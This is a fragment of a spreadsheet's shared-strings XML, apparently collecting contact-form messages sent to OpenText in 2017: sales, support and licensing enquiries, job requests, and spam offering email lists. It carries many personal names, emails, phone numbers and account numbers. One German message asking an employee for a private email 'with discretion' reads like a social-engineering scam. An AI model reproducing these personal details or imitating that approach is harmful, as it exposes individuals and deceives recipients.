Können Sie uns bei der Realisierung dieser Idee unterstützen?_x000D_
_x000D_
Mit freundlichen Grüßen_x000D_
Manuel Alherr_x000D_
_x000D_
Manuel Altherr_x000D_
Department of Translational Research and Knowledge Management_x000D_
_x000D_
Otto Bock HealthCare GmbH_x000D_
Max-Näder-Straße 15 | D-37115 Duderstadt_x000D_
Manuel.Altherr@ottobock.de | www.ottobock.de </t>
  </si>
  <si>
    <t xml:space="preserve">Sehr geehrte Damen und Herren, _x000D_
_x000D_
ich hatte am 11.7.2017 mit Ihrer Hotline gesprochen, da ich im Namen für einen unserer Mandanten auf der Suche für eine Softwarelösung zum Klassifizieren von Dokumenten bin (ca. 15.000 Dokumente pro Tag). _x000D_
_x000D_
Mir wurde im Telefonat mitgeteilt, dass sich ein geeigneter Mitarbeiter bei mir melden würde, was leider bis zum heutigen Tag noch nicht geschehen ist. Ich würde gerne in einem kurzen Gespräch verstehen, ob ihre Produkte (Capture Center, Captiva, …) eine mögliche Lösung für unseren Mandanten darstellen. Ich würde mich freuen, wenn sich heute (18.7.2017) noch bei mir melden könnten. _x000D_
_x000D_
Vielen Dank._x000D_
_x000D_
Mit freundlichen Grüßen_x000D_
_x000D_
Dr. Enrico Chlechowitz_x000D_
</t>
  </si>
  <si>
    <t>Businesss</t>
  </si>
  <si>
    <t>Dear Sales Team,_x000D_
_x000D_
Good day!. I'm Budh, a Software Account Executive from Thaiware Communication Co.,Ltd.. We sell software &amp; hardware online in Thailand (https://shop.thaiware.com/). We have a customer asking for your product. Could you please provide me the reseller price for  Open Text Exceed. I hope you could response as soon as possible.If you need more information, please let me know._x000D_
_x000D_
Many Thanks._x000D_
_x000D_
Best Regards,_x000D_
Budh</t>
  </si>
  <si>
    <t>Hi_x000D_
_x000D_
I found you as one of tibco’s partner. I would like to discuss about partnering with you for delivery of TIBCO based projects. Please let me know good time to discuss the same. Below is some information related to our firm._x000D_
_x000D_
Prowess Software Started by two ex-tibco architects who returned to India after 10+ years of work experience in USA. We are focussed on application integration and data science specializations. Management has robust experience in delivering complex end to end project life cycles for fortune 500 customers across different business domains like Retail, Healthcare, Airlines, Insurance and Manufacturing, etc._x000D_
_x000D_
Some of recent deliverables are_x000D_
_x000D_
B2B Integration – Large scale EDI &amp; HIPPA deployments_x000D_
Application Migration – Conversion from BW 5.X to BW 6.X_x000D_
Marketing – Building Large Customer Cache and Real-time Rules Engines_x000D_
24/7 Application Support_x000D_
Fraud Detection – Scalable complex rule event engine_x000D_
Integration Endpoints – SAP, PeopleSoft, Oracle Apps, MQ Series, Mainframe, etc._x000D_
Vendor API integration for Major US retail client_x000D_
Full scale migration of the EDI from GXS to in-house TIBCO BC for a FMCG conglomerate in US._x000D_
Ref:_x000D_
_x000D_
https://www.linkedin.com/in/ajaykumarkonda/_x000D_
_x000D_
https://www.linkedin.com/in/aravind-konda-9487417/_x000D_
_x000D_
http://www.prowesssoft.com/_x000D_
_x000D_
Thanks,_x000D_
_x000D_
Ajay Konda_x000D_
_x000D_
Funder &amp; Vice President</t>
  </si>
  <si>
    <t xml:space="preserve">I have messaged in the past and rec'd no response.  Could you please send me some information regarding licensing fees for Firstclass server and buying software outright?  </t>
  </si>
  <si>
    <t>DWG Viewer Download</t>
  </si>
  <si>
    <t>I would like to work towards an OCC Certification.  I came aboard with ECD and have the latest Captiva Capture Certification.   I need the location of traing materials or classes that will position me to take the OCC Certification exam._x000D_
_x000D_
Thanks!</t>
  </si>
  <si>
    <t xml:space="preserve">To understand costing and compatibility to our accounting software ,Sage </t>
  </si>
  <si>
    <t>inquiring on ECM Documentum capabilities to track paper files with option to scale up to electronic file tracking.</t>
  </si>
  <si>
    <t>We have a very old version of DM and would like information regarding upgrading._x000D_
Thanks,_x000D_
Alyssa</t>
  </si>
  <si>
    <t>Attended the EW2017 and need access to the slide decks presented.</t>
  </si>
  <si>
    <t>How do I configure the Canon copier to print out when a users sends a fax via email to the copiers email address?</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
Would you be interested in obtaining email database of Corecon v7 Software Users?_x000D_
_x000D_
This list Contains Company name, Web address ,Contact name, Phone number, Email address, Title, physical address, City, State ,Zip Code, Country, Phone number, Fax Number, Employee size and last verified date._x000D_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Jacqueline Kenedy</t>
  </si>
  <si>
    <t xml:space="preserve">I am looking for a contact to request a quote. </t>
  </si>
  <si>
    <t>interested in records management integrated with outlook/exchange</t>
  </si>
  <si>
    <t>Looking into renewing support contract for fax server that never worked in a stable manner.</t>
  </si>
  <si>
    <t>Need quote for customer for OpenText ApplicationXtender</t>
  </si>
  <si>
    <t>Need to talk to a sale representative for a demo and information about the contact center workforce optimization for one of our biggest client in the goverment.</t>
  </si>
  <si>
    <t xml:space="preserve">	Hi		_x000D_
			_x000D_
	Would you be interested to acquire an email list of G-Cloud,  Cloud Computing, Cyber Security, IT, Networking, Managed Services, Infrastructure, Telecommunication and IoT industry professionals from your target region?		_x000D_
			_x000D_
	If interested, please let me know your Target Industry: ___? ; Titles: ___? ; Geography: ___? I will get back to you with the counts, samples and pricing details.		_x000D_
			_x000D_
	Regards,		_x000D_
	Amy Gibbs		_x000D_
			_x000D_
			_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Sehr geehrter Herr Gordon Davies, _x000D_
_x000D_
Mein Name ist Nina Stumpf, ich bin der Lohnbuchhaltung der Firma Oil &amp; Gas. Mit Sitz in Schottland. Ich habe die Berufs Messe SMARC Expo 2017 in Genf Schweiz, die von 30. Mai bis 31. Mai 2017 stattfand besucht,von Ihrem Stand dort habe ich Ihre Kontaktdaten._x000D_
 _x000D_
Wenn Sie erlauben, hätte ich gerne etwas wichtiges mit Ihnen zu besprechen, dieses müßte jedoch mit höchster Diskretion behandelt werden._x000D_
 _x000D_
Wenn Sie mir hierzu Ihre private E-Mail Adresse zukommen lassen würden,wäre ich Ihnen sehr dankbar._x000D_
_x000D_
Mit freundlichen Grüßen _x000D_
 _x000D_
N.Stumpf </t>
  </si>
  <si>
    <t xml:space="preserve">We are looking for a solution to retrieve archived documents from SAP. Any information and demo on this request is welcomed  </t>
  </si>
  <si>
    <t>Evaluating Document Composition products. Currently using Planet Press. Have brought Uluro in house but not getting results needed.</t>
  </si>
  <si>
    <t>We are interested in testing Documentum 7.3. We create connectors to crawl content sources and we want to test it with version 7.3._x000D_
_x000D_
Is there any Developer Edition or Trial version available that we can check before?_x000D_
_x000D_
Cheers</t>
  </si>
  <si>
    <t>Hi Sir/Madam,_x000D_
_x000D_
_x000D_
APA Nexus is the dedicated Product Marketing division of APA Nexus Software_x000D_
Solutions. It was incorporated in 2001, keeping in view, the phenomenal rise in_x000D_
customer base of generalized software solutions. APA Nexus is a fast growing_x000D_
name, owing to its successful solution launches in Financial, Insurance and_x000D_
Hospital Management. With ever-increasing users in Financial and Insurance_x000D_
sector, APA Nexus is spreading at a meteoric speed to all corners of India._x000D_
_x000D_
APA Nexus. was incorporated in India to provide techno_x000D_
consulting and outsourcing of IT enabled services to corporate in Japan,_x000D_
Australia, Dubai and Singapore. Managed by a team of professionals with_x000D_
extensive experience in IT consulting for various industry verticals, APA Nexus_x000D_
International values its team more than any other asset._x000D_
_x000D_
For more details please refer out website._x000D_
www.apanexus.com_x000D_
_x000D_
Kind regards,_x000D_
Pavan Bhavsar</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
Would you be interested to reach all the Healthcare companies. _x000D_
_x000D_
Based on your company profile, we have developed an extensive database of following Software users with opt-in emails, telephone numbers and other details._x000D_
_x000D_
Own the data in excel file for unlimited usages: _x000D_
_x000D_
Emr software, drug dictionary software, medical emr software, medical imaging software, medical solution, American medical distributor, bscs billing, Hollister medical, medical bouffant caps, medical claim billing software, medical database software, medical dictionary software, medical plaster, pda medical software, pocket pc medical software, dme medical billing software, electronic medical records neurosurgery, hipaa compliant medical billing software, medical finger cots, medical software distributor, rfp patient billing._x000D_
_x000D_
Job Level - Healthcare IT professionals, clinicians, executives and vendors, C-Level/VP/Director/Manager and others as per criteria._x000D_
_x000D_
Kindly let me know your target criteria so that we can provide free samples and other details for your review :_x000D_
_x000D_
Target Industry :_x000D_
Target Geography :_x000D_
Target Job Title :_x000D_
_x000D_
Look forward to hear from you soon. _x000D_
_x000D_
Regards,_x000D_
Jenny Johnson</t>
  </si>
  <si>
    <t>I would Like to Know who are the Reseller partner in Kuwait for rightfax server and other opentext products like DM Server.</t>
  </si>
  <si>
    <t>Unable to view my support page, need to update on my opened tickets. Please help to give access.</t>
  </si>
  <si>
    <t>Interested in power Docs. Sister company going to use it but not the SFDC version. Want to understand the best option. Currently using Conga Composer.</t>
  </si>
  <si>
    <t>We are currently look for an Enterprise Document Management solution for our company to both scan our current paper files in, and migrate to a Content Management software solution for the future.</t>
  </si>
  <si>
    <t>Hi, can I chase up a reply to service request 1-2957500611, please? This has been open since 26/06/2017.</t>
  </si>
  <si>
    <t>I am Alkesh , and I have done my graduation recently 2017 with computer science. _x000D_
_x000D_
In future any vacancy are free for the post of developer please inform me._x000D_
_x000D_
Thanks</t>
  </si>
  <si>
    <t xml:space="preserve">Looking to consolidate our business operations into one format. We have a large fax operation (incoming/outgoing). The email faxes are currently transmitted through your company. We open in Adobe and annotate on the adobe form and send (email/fax) the annotated form back to the original. We are looking for a vendor that can perform this function or advise on this function. Must be HIPAA secure.  </t>
  </si>
  <si>
    <t>I need to transfer licenses from one computer to another. How is this achieved? Additionally, I am unable to update my password._x000D_
Thanks</t>
  </si>
  <si>
    <t>We have RightFax 9.4 installed on one of our servers and would like to migrate the database to a new SQL 2014 server. Upon testing this we realised that SQL 2014 does not work with RightFax 9.4._x000D_
_x000D_
I sent a request over last week to see if we were eligible to receive any updates, I have confimed our SUID but have since received no further details._x000D_
_x000D_
Please can you advise whether any upgrades are available to us.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi ,_x000D_
_x000D_
I am Hannah from https://forcegrowth.ae/bitrix which is a Customer relationship management (CRM) website Companies and Individuals.._x000D_
_x000D_
We are looking through your website XXXXX.com  and notice that you have unique taste about Relationship and Management. We would love to cooperate with you. We want to make an offer:_x000D_
_x000D_
We provide you with the unique article about Customer relationship management (CRM) trends. We will show you something very unique and interesting facts upon the Customer Relationship. We are having the experienced and highly skilled people to tell you their stories and experience about Relationship management._x000D_
_x000D_
_x000D_
Please let me know if you are willing to make your site with full of interesting and factual telling stories to your valued Readers about the “CRM” and its effective use in the daily course of business life. _x000D_
If you have any other proposal in mind, feel free to contact us. _x000D_
Best regards,_x000D_
Hannah Cox_x000D_
_x000D_
I am Hannah from https://forcegrowth.ae/bitrix which is a Customer relationship management (CRM) website Companies and Individuals.._x000D_
_x000D_
We are looking through your websitehttp://www.opentext.com  and notice that you have unique taste about Relationship and Management. We would love to cooperate with you. We want to make an offer_x000D_
</t>
  </si>
  <si>
    <t>Iam BE graduate searching job on Hadoop</t>
  </si>
  <si>
    <t>Because of some customer using Huawei storage device and requesting archiving data on storage device with opentext.</t>
  </si>
  <si>
    <t>To partner with your team for skills acquisition and empowerment programme for the widows, orphans and less-privileged in my community. I have over 130 widows and 17 orphans registerd in my NGO. We are located in Abuja Nigeria.</t>
  </si>
  <si>
    <t>Need pre sales support to do a function requirement study for one of our clients</t>
  </si>
  <si>
    <t>Dear Sir/Madam,_x000D_
_x000D_
Greeting from Computer Port IT Solutions!!_x000D_
_x000D_
I’m Sri Harsha Sista, the IT Sales Manager for Computer Port IT Solutions _x000D_
_x000D_
Can I have your appointment anytime this week in order to discuss in detail about your requirement regarding IT End to End Infrastructure Solutions/Services?_x000D_
_x000D_
For More Details about our services/solutions, Please visit www.computerport.in</t>
  </si>
  <si>
    <t>We at HP Inc, are already using VIM 7.0 since last 3 years. We are evaluating the latest version of VIM, and hence wanted a demo around the integration with SAP and the latest functionalities.</t>
  </si>
  <si>
    <t xml:space="preserve">Ref: #RC192976: Urgent - Open Text Support Contract Expires on 31 Jul 2017. Reference Number: SXSG08106249. Contract Number: 0026000991_x000D_
Renewal Number: RC192976. Previous PO Number: 3900516456_x000D_
You keep on sending the automated emails, There is no response to my query. I asked, why there is increase in the price_x000D_
	I am still waiting, please respond . we need to renew urgently. _x000D_
Best Regards,_x000D_
Niranjan_x000D_
 _x000D_
Atos Information Technology (Singapore) Pte Ltd_x000D_
988 Toa Payoh North, #08-01_x000D_
Singapore 319002_x000D_
M: +65 9836 7420_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Madam/Sir, _x000D_
_x000D_
I wanted to know the pricing for OpenText Media Management, Media Bin, Cloud edition and On demand. _x000D_
_x000D_
Please do let me know!_x000D_
_x000D_
Best, _x000D_
Sheoli Biswas </t>
  </si>
  <si>
    <t>I need to update my card payment details</t>
  </si>
  <si>
    <t>Do you provide training on exstream dialogue?. My husband would like to get trained on this tool. What training format do you have?</t>
  </si>
  <si>
    <t>Are there any cloud providers that offer SQL Base 11 or 12 as a Service?</t>
  </si>
  <si>
    <t>If there are any openings you can contact me.</t>
  </si>
  <si>
    <t>Looking for contact and partner in Western Australia</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
I want to work with OpenText. For that I want to ask, how can I prepare myself in the best way to start with Opentext?_x000D_
_x000D_
- Is there a developer/trial edition?_x000D_
- Are there some webseminars?_x000D_
_x000D_
What would you recommend?_x000D_
_x000D_
Best regards_x000D_
Gunnar W. Polte</t>
  </si>
  <si>
    <t xml:space="preserve">I need a really rough cost of IHUB for comparison with other products.  We want to schedule reports, possibly have a single-signon. For around 75 employees on a single server with a test environment. </t>
  </si>
  <si>
    <t xml:space="preserve">GCG currently uses Captiva software. We believe there is a lot we don't know about what Captiva can do for GCG from an enterprise standpoint. Would like to meet with Open Text to discuss the full functionality of the Captiva product.  </t>
  </si>
  <si>
    <t>Interested in DMS</t>
  </si>
  <si>
    <t>Dear Sir/Madam:_x000D_
_x000D_
Our company LIMON INFORMATICA, SA DE CV is a Reseller of Software in MEXICO._x000D_
_x000D_
We have one client that asks about your software HostExplorer._x000D_
I need the product registered to the End User and billed to my Company._x000D_
_x000D_
Please tell me how we can buy the products:_x000D_
- We can pay by Credit Card or Wire Transfer_x000D_
- Product Price?_x000D_
- Discount to resell the product?_x000D_
- Delivery by ESD (Electronic Software Delivery)._x000D_
_x000D_
I will wait for your answer._x000D_
_x000D_
Thanks for your attention._x000D_
Sincerely, Enrique Limón Limón_x000D_
Director_x000D_
LIMON INFORMATICA, SA DE CV_x000D_
Tel. &amp; Fax. +52 (81) 8192-3200_x000D_
Email: elimon@limon.com.mx</t>
  </si>
  <si>
    <t>user receiving no fax attachment but just pages of text in the email body.  No reports for any other useres.</t>
  </si>
  <si>
    <t>How often does OTEX pay a dividend, monthly or quarterly?</t>
  </si>
  <si>
    <t xml:space="preserve">Hi, _x000D_
_x000D_
I was wondering what steps I need to take in order to close out/cancel out account (acct # 757587)?_x000D_
_x000D_
Please let me know if you need anything from me._x000D_
_x000D_
Thank you very much,_x000D_
Ryan  _x000D_
</t>
  </si>
  <si>
    <t>Account info.</t>
  </si>
  <si>
    <t>I am working with a large insurance and banking group in the APAC region on a digital customer experience initiative. One element of this scope is the client’s call center operations. The team plans to conduct a preliminary speech analytics pilot using historical call data. This will require getting a tool up and running in a matter of weeks that is capable of going from raw call files + metadata to insights with minimal investment. Traditional call center software players (NICE, Verint, Callminer) are being considered as well as analytical offerings (IBM, Microsoft, Google, Python, R, etc.) Results might drive a larger implementation of call center software focused beyond speech analytics in the medium to long-term. Is someone from your team able to answer some high-level questions we have at this stage, and potentially provide a demo?_x000D_
_x000D_
Blake</t>
  </si>
  <si>
    <t>We are textile manufacturer having our manufacturing base in India, and we are looking to become a merchandise supplier, so please send us the link for vendor registration and a sales contact information. Thanks</t>
  </si>
  <si>
    <t>Dear Sir/Madam_x000D_
_x000D_
Our company, Marshalls PLC is looking to transition our present Fax solution to the cloud and would like to know what kind of cloud offering OpenText has to offer._x000D_
_x000D_
I would appreciate if someone could contact me as I would like to get a breakdown of all the various costs involved. _x000D_
_x000D_
In addition, I would like to know if there is a one off cost for the migration from our present On-Prem solution to the cloud._x000D_
_x000D_
Thanks_x000D_
_x000D_
Kind Regards_x000D_
Anup Kaluskar._x000D_
Systems DBA</t>
  </si>
  <si>
    <t>interessati adozione opentext, richiediamo contatto per demo</t>
  </si>
  <si>
    <t>I based in Vevey working for Corporate Operations on a global level and I am working on providing a mobile solution for document viewing, editing as well as interactive SOPs. I know we are moving to D2 and want to understand what options are provided by you for mobile content before I commit to building something. I am particulary interested in operators on the floor viewing documents for their machine and using SOP for their machine with step by step confirmation (and recording of completion times)._x000D_
Thanks,_x000D_
Kris Matlock</t>
  </si>
  <si>
    <t xml:space="preserve">Website is throwing an error.  Best fix it.  Here is the URL._x000D_
_x000D_
http://www.opentext.com/2/global/sso_download_open?docpath=/product/livelink/capture-delivery/open-text-capture-center-product-overview.pdf_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Software query</t>
  </si>
  <si>
    <t>Hi.... I am trying to contact Ms Meha Varier. Can you please advice me an email address for her office?_x000D_
Thanks &amp; Regards,_x000D_
Andrew</t>
  </si>
  <si>
    <t>Fresher looking for a job opportunity</t>
  </si>
  <si>
    <t>Getting error in opentext BDA while connecting to fastdb. If i drag a table into explore. I am getting error Error establishing connection. Unable to create connection - connection refused._x000D_
Please help me to resolve</t>
  </si>
  <si>
    <t>I have a renewal notice which I want to upload a purchase order for, however when I click on the link it comes up with a message that my account does not grant access to this source.  The renewal notice is RC198991-3190</t>
  </si>
  <si>
    <t>I am unable to download the Brava Reader software and i have paid my subscription and i am losing days</t>
  </si>
  <si>
    <t xml:space="preserve">May I know ALL the ECM solutions you are carrying/offering?  </t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sirs,_x000D_
Our company is using SAP VIM on the business applications._x000D_
We want to know if there is any possibility to use a web service or something similar from SAP VIM, in order to process PDFs._x000D_
We are interested to understand if we can use SAP VIM for some OCR process on PDF documents, calling some web service._x000D_
Thank you,_x000D_
Ovidiu Sodolea_x000D_
Tenova S.p.A._x000D_
</t>
  </si>
  <si>
    <t>Hi _x000D_
I am trying to get some information regarding a software called Teleform which is used to capture Survey results. We have been using Teleform for many years and we think it needs an upgrade. We understand that Opentext has acquired Teleform from HP and we would like to find out what the current version of Teleform is capable of and how we can go about purchasing it. Thanks.</t>
  </si>
  <si>
    <t>Would like few of our employees to undergo a training on Rightfax. Kindly let me know on the process for a certification course with OpenText.</t>
  </si>
  <si>
    <t>I am starting a project to look at the potential of moving our Controlled Document management system to a different fit for purpose system._x000D_
We are not at the tender process but i am interested in highlevel potential costs.  Eg Licencing for up to 4000 users, implementation costs and ongoing support costs.  Can you please get an Australian based sales person to contact me to discuss._x000D_
Thanking You _x000D_
Amy Miliauskas</t>
  </si>
  <si>
    <t>request to download Opentext Sentiment Analysis REST API</t>
  </si>
  <si>
    <t>my EDOC 5.3.1 patch 1 DOCFusion service wont start after April 2017 security update.</t>
  </si>
  <si>
    <t>Seeking For job opportunities</t>
  </si>
  <si>
    <t>Need a quote for livelink software.</t>
  </si>
  <si>
    <t>My client uses your product today but they use the license of the corporate entity they are part of.  They are breaking away from the corporate entity so they need their own license.  I need budgetary pricing as my company is responsible for the transition of their IT.</t>
  </si>
  <si>
    <t xml:space="preserve">I need to talk with a sales rep about looking in to switching our current in house Rightfax, to cloud faxing with rightfax connect. </t>
  </si>
  <si>
    <t>Error when sending:_x000D_
The cause of the error was:_x000D_
_x000D_
file "input_document.smtp" may be corrupted_x000D_
unmime_V2 "input_document.smtp"&gt; /xdds/parser/parser4a_sd16/parser_multifile/m2f_2684389_09ae69a9448cfa550767d07c33cba9c4_2287384_17319/unmime_V2.out aborted with status 34304_x000D_
_x000D_
_x000D_
For assistance, please contact EasyLink Customer Support: _x000D_
_x000D_
http://www.easylink.com/support_x000D_
_x000D_
_x000D_
Can you help me figure out the cause and how to resolve?</t>
  </si>
  <si>
    <t xml:space="preserve">I need a copy of the click through EULA (End User License Agreement) for my software records.  I am expecting it will state any limitations on license installations.  </t>
  </si>
  <si>
    <t>Looking for a content management solution that plugs into SharePoint and can work with Adobe FrameMaker book files (.book).</t>
  </si>
  <si>
    <t xml:space="preserve">Proposal management system - inquiry </t>
  </si>
  <si>
    <t>We are reseller software, our customer need a quotation for  Hummingbird Host Explorer one license</t>
  </si>
  <si>
    <t>Hello,_x000D_
Can I please get contact information for HR so I can order VOE for Baljit Gill.</t>
  </si>
  <si>
    <t>Teleform Pricing</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
As your company is one of the leading players in Big Data Analytics,_x000D_
_x000D_
I would like to grasp your interest level in purchasing following business executive contacts for you marketing initiates?_x000D_
_x000D_
Few Titles that might be of your interest:-_x000D_
_x000D_
	Systems Analyst_x000D_
	Business Intelligence Consultant_x000D_
	Business Intelligence Developer_x000D_
	SQL Server Business Intelligence_x000D_
	Business Intelligence Administrator_x000D_
	Business Intelligence Manager_x000D_
	Business Intelligence Analyst_x000D_
	Data Warehousing_x000D_
	System Architects_x000D_
	Designers_x000D_
	Software Developers_x000D_
	Data Architects_x000D_
	Data Administrators_x000D_
	Data Scientist_x000D_
	Data Engineer_x000D_
	Data Stewards_x000D_
	Data analysts_x000D_
	Business Analysts and many more…_x000D_
_x000D_
Please let me know if this is of interest and if we can connect on a quick call at your convenience, to discuss the opportunities of working together_x000D_
_x000D_
Regards,_x000D_
Austin_x000D_
_x000D_
Austin Clive _x000D_
Sr. Marketing Consultant _x000D_
Marketing Team_x000D_
512-375-3771_x000D_
</t>
  </si>
  <si>
    <t>Interested in a Managed Print Services product that will help manage our print jobs better.</t>
  </si>
  <si>
    <t>We are currently looks for an electronic document management system that will encompass change control, document management, CAPA, investigations, etc.</t>
  </si>
  <si>
    <t>I am looking for a software to manage documents, version controls to support the R&amp;D, regulatory and QA functions.  I used Documentum at my previous employment.  I am looking for similar system.</t>
  </si>
  <si>
    <t>Play role in GET</t>
  </si>
  <si>
    <t xml:space="preserve">Information about license cost </t>
  </si>
  <si>
    <t>Greetings,_x000D_
My name is Vanessa Slaven with Merchants Information Solutions and I’m in the process of verifying employment of a former employee.  Could you please assist me with this verification or direct me to the appropriate party who might be able to assist me with this verification request?</t>
  </si>
  <si>
    <t>Need Trial License for OpenText Brava for Documentum Webtop and D2</t>
  </si>
  <si>
    <t>Need to purchase SQLWindows 7.0, currently running 6.2.</t>
  </si>
  <si>
    <t>Documentum Adminstration course</t>
  </si>
  <si>
    <t>BNY Mellon Legal is considering the adoption of a DMS.</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
I hope you are the right person to talk about new companies interested in having business relationships with you._x000D_
_x000D_
If yes, then let me know the specific industry you are interested in and we will send you a sample file of companies and their contacts with complete contact information such as Business email, Phone number, Names and Mailing address etc. of each executive._x000D_
_x000D_
These companies and contacts index can be used for your multi-marketing initiatives as well as new customer acquisition efforts your sales teams engage in._x000D_
_x000D_
Further, we can validate and clean any of the marketing databases you may currently have in-house, and append additional contacts or company information that can both save you valuable time and increase your sales._x000D_
_x000D_
I look forward to your reply.  _x000D_
_x000D_
Regards,_x000D_
Peter Thomas | Marketing Manager_x000D_
Sublime Data Inc._x000D_
peter@sublimedata.us_x000D_
www.sublimedata.us</t>
  </si>
  <si>
    <t xml:space="preserve">Good Morning, _x000D_
_x000D_
My name is Andrew Leaman, Document Controller for Keolis Grand River LP in Waterloo, Ontario._x000D_
_x000D_
We are in the process of establishing a Data Management System (DMS) and a Safety Management System (SMS) for our company._x000D_
_x000D_
I would like to open a discussion with OpenText concerning the requirements we have for both the DMS and SMS, and if your company can meet them._x000D_
_x000D_
My contact information is attached, and I look forward to hearing from you._x000D_
_x000D_
Regards,_x000D_
_x000D_
Andrew Leaman_x000D_
Document Controller_x000D_
 _x000D_
Keolis Grand River LP_x000D_
518 Dutton Drive, Waterloo_x000D_
ON, N2L 4C6, Canada_x000D_
Mobile: (+1) 519-572-6231_x000D_
Email: andrew.leaman@keolis.ca_x000D_
</t>
  </si>
  <si>
    <t>Do you have training videos for version 8 of the Content Manager (CMS)?</t>
  </si>
  <si>
    <t>Vocês possuem videos de treinamento para versão 8 do gerenciador de conteudo (CMS)?</t>
  </si>
  <si>
    <t>I am reaching out on behalf of Cigna's Legal Department to set up a case management demo for the week of July 24th. Please email at your earliest convenience to discuss. Thanks, Matt</t>
  </si>
  <si>
    <t xml:space="preserve">To discuss renewal process </t>
  </si>
  <si>
    <t xml:space="preserve">I need information on setting up DRM software to protect some office files. We need to ensure the files cannot be taken and used outside the company without our express consent. We would prefer an on-premise solution but are open to hearing other solutions.  </t>
  </si>
  <si>
    <t>In LEO we currently investigate for replacement of electrnic contract archive solution. We are interested in Contarct Center as potential  solution option. Currentlky we use ECM for SAP with VIM and EFM purchased from SAP. Is Contract Center distributed also via SAP or we should manage this with Open Text directly?_x000D_
_x000D_
Best Regards_x000D_
Michal Krawczyk</t>
  </si>
  <si>
    <t>Hi all, I am the new hire for Partner Management in Latin America and I would like your assistance on gathering information about all necessary training for OT ECM Suite Certification (not ECD). Thanks in advance.</t>
  </si>
  <si>
    <t>Active job seeker for both professional and personal growth.</t>
  </si>
  <si>
    <t xml:space="preserve">Good day. I want to do my Cordys or opentext system administrator Certification. I whould like to know how we go about that i am in South </t>
  </si>
  <si>
    <t>Trying to register and apply for a job opening post. However upon completing the form, it says that my email address is already used in your system. I don't remember signing up here before. I also tried to just reset the password and put my email address to reset it, no email for resetting the password was received. Please advise. Thank you.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi , _x000D_
_x000D_
I am heading up the AI World Congress taking place at the O2 Arena in London on January 30th &amp; 31st, would you be interested to take a look at the draft agenda?_x000D_
_x000D_
Confirmed sponsors and speakers so far include Google, Cobalt Speech, Deepmind, Starship, Snips, Moberries, NASA, Uber and Barclays and many more._x000D_
</t>
  </si>
  <si>
    <t>Hi I wanted to know about the Documentum-DMS</t>
  </si>
  <si>
    <t>I really want to know if OpenText is for securing content within and outside of the company. Can I use OpenText to secure files and documents in the company and when they are moving out of the company. Thank you</t>
  </si>
  <si>
    <t>Need more information on support options and possibel partners for Rightfax support. Our current partner Proximus will stop working with Rightfax, but we want to continue with the product.</t>
  </si>
  <si>
    <t>Hi_x000D_
We are going to setup EDI with JPL (John Lewis Partner Ship)._x000D_
Before we can setup the connection, we would like to receive some cost information for the EDI traffic._x000D_
We have today (ECCO SKO A/S) a connection with GXS._x000D_
Could you please contact me._x000D_
Thanks in advance</t>
  </si>
  <si>
    <t xml:space="preserve">in the last years I could use "my-support"; after changing my email-adress (former thomas.hub@fit.fichtner.de) to thomas.hub@fichtner.de I can not use this anymore. Please enable "my Support" for me, I need to have a look to our tickets. Regards, Thomas Hub_x000D_
</t>
  </si>
  <si>
    <t>Hello, I've tried to register to your forums (http://developer.actuate.com/community/forum/) both using Facebook (email is vladimir.smatanik@gmail.com) and using my email account (vladimir.smatanik@inloop.eu) but I haven't received any email confirmation and I'm unable to do anything - not even logout._x000D_
_x000D_
You've got some issues with the registration... can you please resolve it?_x000D_
_x000D_
I'm using the newest version of Chrome on Mac.</t>
  </si>
  <si>
    <t xml:space="preserve"> _x000D_
_x000D_
Hi,_x000D_
_x000D_
Greetings of the day!_x000D_
_x000D_
_x000D_
This is Shweta Dubey Freelancer services provider. Current working for a client who is interested in buying    articles with links on good finance, news and other relevant sites._x000D_
_x000D_
So, if you are interested in selling article placement on sites so please send me your websites URL with price._x000D_
_x000D_
Other than that being a freelancer The provided services by me are:_x000D_
_x000D_
· Content writing,_x000D_
· Web Design/HTML/Animation_x000D_
· SEO, SMM,_x000D_
· Media Buying,_x000D_
· PPC,_x000D_
· Facebook Ad,_x000D_
· All Social media working_x000D_
· Adding games in your website_x000D_
_x000D_
Please let me know if you are interested in my services._x000D_
_x000D_
Looking for a good business relationship._x000D_
_x000D_
Thanks and Regards_x000D_
Shweta_x000D_
Skype: seo1seo1_x000D_
Contact: +919993036692_x000D_
SEO, SMO, Content writing and Web Designing_x000D_
Service Provider</t>
  </si>
  <si>
    <t>I am using trial version of Documentum 7.1 Developer Edition and while starting documentum server I could not see cmis services deployed, searched for emc-cmis.war file but it is not there in the virtual machine image. Please send me the web archive file to my email as soon as possible for evaluation.</t>
  </si>
  <si>
    <t>we are doing a tool benchmarking for EMC solution for an Energy client in SE Asia. Recently learnt about the acquisition of Dell EMC. for a detailed functional requirement assessment - would it possible for you to share an extensive tool/feature list in the ECM</t>
  </si>
  <si>
    <t>I need a quote for Captiva Pixtools pricing/license.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
Like to explore more on OpenText™ Magellan._x000D_
_x000D_
Do you have a hands-on tool made available on cloud or download for limited period to explore the capabilities._x000D_
_x000D_
Thanks,_x000D_
Vikram Kumar_x000D_
Consultant_x000D_
Bangalore._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>I would like to know Right fax distributors in Malaysia and the contacts and email. I would like to know support/SLA for right fax as well. One of my customer is using RightFax but no support. I'm trying to help them to sort this issue.</t>
  </si>
  <si>
    <t>Hello._x000D_
_x000D_
We are interested in your Gupta products (Team Developer, Mobile, etc.). We are experienced in TD 3.1._x000D_
_x000D_
Could you please give us more information about certifications or training?. We want to increase our expertise and skills in order to go to the market with better solutions._x000D_
_x000D_
Thank you in advance._x000D_
_x000D_
Best regards.</t>
  </si>
  <si>
    <t>We would like to see your product convert a complex workflow application from Notes to .Net for hosting in an Azure Platform._x000D_
_x000D_
We have 40+ applications that we would like to move to the cloud. Some can be moved to existing cloud based alternatives, but most  will need to be completely recreated as there is no off the shelf equivalent._x000D_
_x000D_
Thanks</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
Hope you are doing great._x000D_
_x000D_
